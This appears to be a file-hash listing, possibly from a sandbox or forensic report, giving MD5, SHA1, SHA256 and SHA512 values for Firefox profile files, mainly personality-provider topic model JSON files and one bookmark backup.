C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_computers_and_electronics.json

MD5 6ccd943214682ac8c4ec08b7ec6dbcbd
SHA1 18417647f7c76581d79b537a70bf64f614f60fa2
SHA256 ab20b97406b0d9bf4f695e5ec7db4ebad5efb682311e74ca757d45b87ffc106b
SHA512 e57573d6f494df8aa7e8e6a20427a18f6868e19dc853b441b8506998158b23c7a4393b682c83b3513aae5075a21148dd8ca854a11dabcea6a0a0db8f2e6828b8

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_science.json

MD5 7a8fd079bb1aeb4710a285ec909c62b9
SHA1 8429335e5866c7c21d752a11f57f76399e5634b6
SHA256 9606ce3988b2d2a4921b58ac454f54e53a9ea8f358326522a8b1dcc751b50b32
SHA512 8fc1546e509b5386c9e1088e0e3a1b81f288ef67f1989f3e83888057e23769907a2b184d624a4e4c44fcd5b88d719bd4cca94dfb33798804a721b8be022ec0c6

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_jobs_and_education.json

MD5 2d69892acde24ad6383082243efa3d37
SHA1 d8edc1c15739e34232012bb255872991edb72bc7
SHA256 29080288b2130a67414ecb296a53ddd9f0a4771035e3c1b2112e0ce656a7481a
SHA512 da391152e1fbce1f03607b486c5dea9a298a438e58e440ebb7b871bd5c62d7339b540eed115b4001b9840de1ba3898c6504872ff9094ba4d6a47455051c3f1c5

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_real_estate.json

MD5 9899942e9cd28bcb9bf5074800eae2d0
SHA1 15e5071e5ed58001011652befc224aed06ee068f
SHA256 efcf6b2d09e89b8c449ffbcdb5354beaa7178673862ebcdd6593561f2aa7d99a
SHA512 9f7a5fbe6d46c694e8bc9b50e7843e9747ea3229cf4b00b8e95f1a5467bd095d166cbd523b3d9315c62e9603d990b8e56a018ba4a11d30ad607f5281cc42b4cd

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_shopping.json

MD5 97d4a0fd003e123df601b5fd205e97f8
SHA1 a802a515d04442b6bde60614e3d515d2983d4c00
SHA256 bfd7e68ddca6696c798412402965a0384df0c8c209931bbadabf88ccb45e3bb6
SHA512 111e8a96bc8e07be2d1480a820fc30797d861a48d80622425af00b009512aacb30a2df9052c53bfbf4ee0800b6e6f5b56daa93d33f30fecb52e2f3850dfa9130

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_people_and_society.json

MD5 b1bd26cf5575ebb7ca511a05ea13fbd2
SHA1 e83d7f64b2884ea73357b4a15d25902517e51da8
SHA256 4990a5d17bea15617624c48a0c7c23d16e95f15e2ec9dd1d82ee949567bbaec0
SHA512 edcede39c17b494474859bc1a9bbf18c9f6abd3f46f832086db3bb1337b01d862452d639f89f9470ca302a6fcb84a1686853ebb4b08003cb248615f0834a1e02

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_internet_and_telecom.json

MD5 36689de6804ca5af92224681ee9ea137
SHA1 729d590068e9c891939fc17921930630cd4938dd
SHA256 e646d43505c9c4e53dbaa474ef85d650a3f309ccf153d106f328d9b6aeb66d52
SHA512 1c4f4aa02a65a9bbdf83dc5321c24cbe49f57108881616b993e274f5705f0466be2dd3389055a725b79f3317c98bdf9f8d47f86d62ebd151e4c57cc4dca2487c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_pets_and_animals.json

MD5 5b26aca80818dd92509f6a9013c4c662
SHA1 31e322209ba7cc1abd55bbb72a3c15bc2e4a895f
SHA256 dd537bfb1497eb9457c0c8ecbd2846f325e13ddef3988fd293a29e68ab0b2671
SHA512 29038f9f3b9b12259fb42daa93cdefabb9fb32a10f0d20f384a72fe97214eff1864b7fa2674c37224b71309d7d9cea4e36abd24a45a0e65f0c61dc5ca161ec7c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_online_communities.json

MD5 37a74ab20e8447abd6ca918b6b39bb04
SHA1 b50986e6bb542f5eca8b805328be51eaa77e6c39
SHA256 11b6084552e2979b5bc0fd6ffdc61e445d49692c0ae8dffedc07792f8062d13f
SHA512 49c6b96655ba0b5d08425af6815f06237089ec06926f49de1f03bc11db9e579bd125f2b6f3eaf434a2ccf10b262c42af9c35ab27683e8e9f984d5b36ec8f59fd

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_books_and_literature.json

MD5 df96946198f092c029fd6880e5e6c6ec
SHA1 9aee90b66b8f9656063f9476ff7b87d2d267dcda
SHA256 df23a5b6f583ec3b4dce2aca8ff53cbdfadfd58c4b7aeb2e397eade5ff75c996
SHA512 43a9fc190f4faadef37e01fa8ad320940553b287ed44a95321997a48312142f110b29c79eed7930477bfb29777a5a9913b42bf22ce6bb3e679dda5af54a125ea

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_games.json

MD5 4182a69a05463f9c388527a7db4201de
SHA1 5a0044aed787086c0b79ff0f51368d78c36f76bc
SHA256 35e67835a5cf82144765dfb1095ebc84ac27d08812507ad0a2d562bf68e13e85
SHA512 40023c9f89e0357fae26c33a023609de96b2a0b439318ef944d3d5b335b0877509f90505d119154eaa81e1097ecfb5aa44dd8bb595497cdecfc3ee711a1fe1d5

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_beauty_and_fitness.json

MD5 0ed0473b23b5a9e7d1116e8d4d5ca567
SHA1 4eb5e948ac28453c4b90607e223f9e7d901301c4
SHA256 eed46e8fe6ff20f89884b4fc68a81e8d521231440301a01bb89beec8ebad296b
SHA512 464508d7992edfa0dfb61b04cfc5909b7daacf094fc81745de4d03214b207224133e48750a710979445ee1a65bb791bf240a2b935aacaf3987e5c67ff2d8ba9c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_finance.json

MD5 e95c2d2fc654b87e77b0a8a37aaa7fcf
SHA1 b4b00c9554839cab6a50a7ed8cd43d21fdaf35dc
SHA256 384bf5fcc6928200c7ebb1f03f99bf74f6063e78d3cd044374448f879799318e
SHA512 9696998a8d0e3a85982016ff0a22bb8ae1790410f1f6198bb379c0a192579f24c75c25c7648b76b00d25a32ac204178acaccd744ee78846dfc62ebf70bf7b93a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_arts_and_entertainment.json

MD5 6c651609d367b10d1b25ef4c5f2b3318
SHA1 0abcc756ea415abda969cd1e854e7e8ebeb6f2d4
SHA256 960065cc44a09bef89206d28048d3c23719d2f5e9b38cfc718ca864c9e0e91e9
SHA512 3e084452eefe14e58faa9ef0d9fda2d21af2c2ab1071ae23cde60527df8df43f701668ca0aa9d86f56630b0ab0ca8367803c968347880d674ad8217fba5d8915

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_law_and_government.json

MD5 80c49b0f2d195f702e5707ba632ae188
SHA1 e65161da245318d1f6fdc001e8b97b4fd0bc50e7
SHA256 257ee9a218a1b7f9c1a6c890f38920eb7e731808e3d9b9fc956f8346c29a3e63
SHA512 972e95de7fe330c61cd22111bd3785999d60e7c02140809122d696a1f1f76f2cd0d63d6d92f657cdec24366d66b681e24f2735a8aabb8bcecec43c74e23fb4f5

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_health.json

MD5 11711337d2acc6c6a10e2fb79ac90187
SHA1 5583047c473c8045324519a4a432d06643de055d
SHA256 150f21c4f60856ab5e22891939d68d062542537b42a7ce1f8a8cec9300e7c565
SHA512 c2301ed72f623b22f05333c5ecc5ebf55d8a2d9593167cc453a66d8f42c05ff7c11e2709b6298912038a8ea6175f050bbc6d1fc4381f385f7ad7a952ad1e856b

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_business_and_industrial.json

MD5 a92a0fffc831e6c20431b070a7d16d5a
SHA1 da5bbe65f10e5385cbe09db3630ae636413b4e39
SHA256 8410809ebac544389cf27a10e2cbd687b7a68753aa50a42f235ac3fc7b60ce2c
SHA512 31a8602e1972900268651cd074950d16ad989b1f15ff3ebbd8e21e0311a619eef4d7d15cdb029ea8b22cf3b8759fa95b3067b4faaadcb90456944dbc3c9806a9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_food_and_drink.json

MD5 70ba02dedd216430894d29940fc627c2
SHA1 f0c9aa816c6b0e171525a984fd844d3a8cabd505
SHA256 905357002f2eced8bba1be2285a9b83198f60d2f9bb1144b5c119994f2ec6e34
SHA512 3ae60d0bf3c45d28e340d97106790787be2cc80ba579d313b5414084664b86e89879391c99e94b6e33bdc5508ea42a9fd34f48ca9b1e7adfa7b6dd22c783c263

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_reference.json

MD5 567eaa19be0963b28b000826e8dd6c77
SHA1 7e4524c36113bbbafee34e38367b919964649583
SHA256 3619daa64036d1f0197cdadf7660e390d4b6e8c1b328ed3b59f828a205a6ea49
SHA512 6766919b06ca209eaed86f99bee20c6dad9cc36520fc84e1c251a668bcfe0afcf720ea6c658268dc3bbaaf602bfdf61eb237c68e08d5252ea6e5d1d2a373b9fe

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_blogging_resources_and_services.json

MD5 c82700fcfcd9b5117176362d25f3e6f6
SHA1 a7ad40b40c7e8e5e11878f4702952a4014c5d22a
SHA256 c9f2a779dba0bc886cc1255816bd776bdc2e8a6a8e0f9380495a92bb66862780
SHA512 d38e65ab55cee8fef538ad96448cd0c6b001563714fc7b37c69a424d0661ec6b7d04892cf4b76b13ddbc7d300c115e87e0134d47c3f38ef51617e5367647b217

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_hobbies_and_leisure.json

MD5 bb45971231bd3501aba1cd07715e4c95
SHA1 ea5bfd43d60a3d30cda1a31a3a5eb8ea0afa142a
SHA256 47db7797297a2a81d28c551117e27144b58627dbac1b1d52672b630d220f025d
SHA512 74767b1badbd32cacd3f996b8172df9c43656b11fea99f5a51fff38c6c6e2120fae8bdd0dd885234a3f173334054f580164fdf8860c27cbcf5fb29c5bcdc060d

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\personality-provider\nb_model_build_attachment_travel.json

MD5 48139e5ba1c595568f59fe880d6e4e83
SHA1 5e9ea36b9bb109b1ecfc41356cd5c8c9398d4a78
SHA256 4336ac211a822b0a5c3ce5de0d4730665acc351ee1965ea8da1c72477e216dfa
SHA512 57e826f0e1d9b12d11b05d47e2f5ae4f5787537862f26e039918cb14faff4bc854298c0b7de3023e371756a331c0f3ee1aa7cebbbf94ec70cdfc29e00a900ed1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ppqxj052.default-release\bookmarkbackups\bookmarks-2023-11-23_11_Hy1-kRR0tuDG+O2L7Ado7Q==.jsonlz4

MD5 d788f8f0f0962792292e913aafcbe9cd
SHA1 71d88de50a84856663664e34995554f1a9edd818
SHA256 d9274ca2c10a5d6ecb3a50068e9e5768e401ad79a719d62c56b9016fcee1ddd7
SHA512 bd7d0dba6b44b5f2b7b39a7904559ec0f9a8be20eb2eafea7119fbbd90447ca835f4f4e153a51dec27a7a732e54429806f1def6f149cab6e9385fee83bc3ad82